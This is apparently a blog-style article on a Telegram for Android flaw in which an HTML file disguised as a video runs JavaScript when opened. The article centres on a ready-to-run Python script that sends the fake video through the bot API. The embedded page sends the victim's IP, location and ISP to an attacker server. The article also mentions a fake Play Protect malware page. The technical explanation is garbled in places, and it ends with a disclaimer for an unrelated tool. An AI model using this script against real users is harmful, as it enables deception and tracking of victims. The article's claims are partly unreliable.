This article examines a scenario that works similarly to the CVE-2024-7014 vulnerability. A file with an ".htm" extension is disguised as a video and sent via the Telegram API, and while the user expects a video, the JavaScript code inside the HTML is actually executed.
Technical Details
Evilloader is a loader that allows attackers to download and run additional malicious payloads on target systems. CVE-2024-7014 describes an update in the anti-analysis mechanisms of this module. In this scenario, a fake video leads the victim to a malware (fake play protect) download page and then sends an IP logger as well.
Vulnerability Details
The main reason for the vulnerability is that the ".htm" file format in the response to Telegram servers is perceived as a video. The ".htm" code snippet is opened in a browser under "content://". That is: content://org.telegram.messenger.provider/media/Android/data/org.telegram.messenger/ files/Telegram/Telegram%20Video/4_5924894289476721732.htm The content is opened, allowing the specified HTML page to be triggered and opened.
Scenario (ip logger)
The victim may try to open this file with a video player, and upon failing (since it's not an actual video format), it can redirect to the default browser, or if it is understood to be an "HTML file," it can be double-clicked to open in the browser. This allows the malicious JavaScript to run.
If the victim downloaded the file from Telegram thinking it was a video, the browser actually runs the HTML content, and the IP information goes to the attacker's server.
tg.py
import requests
BOT_TOKEN = "your_bot_token"
CHAT_ID = "your_chat_id"
html_content = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script>
fetch('http://ip-api.com/json')
.then(response => response.json())
.then(data => {
fetch('http://192.168.137.1:5000/log_ip', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
ip: data.query,
country: data.country,
region: data.regionName,
city: data.city,
isp: data.isp
})
});
})
.catch(error => console.error('Error fetching IP:', error));
</script>
</head>
<body>
</body>
</html>
"""
html_path = "testv.mp4"
with open(html_path, "w") as file:
file.write(html_content)
files = {
"video": (
"a.htm",
open(html_path, "rb"),
"video/mp4"
)
}
url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo"
data = {"chat_id": CHAT_ID, "supports_streaming": False}
response = requests.post(url, data=data, files=files)
if response.status_code == 200:
print("message send")
else:
print(f"error: {response.text}")In this code, a .htm file is presented as a “video” and sent via the Telegram API. On Android devices, when the user tries to open this file, it actually runs a JavaScript-containing HTML page.
The video below shows how “malware and ip logger” scenarios are carried out:
Disclaimer (Legal and Ethical Use)
Matkap is intended solely for educational and research purposes. This tool is designed to help cybersecurity professionals analyze Telegram bot interactions and identify potential security risks.
- Do not use this tool for illegal activities or unauthorized access.
- You assume full responsibility for any actions performed using this tool. The developers and contributors are not liable for misuse, damage, or legal consequences.
- Ensure compliance with Telegram's API Terms of Service and all applicable local laws.
- If you do not agree to these terms, do not use the tool.
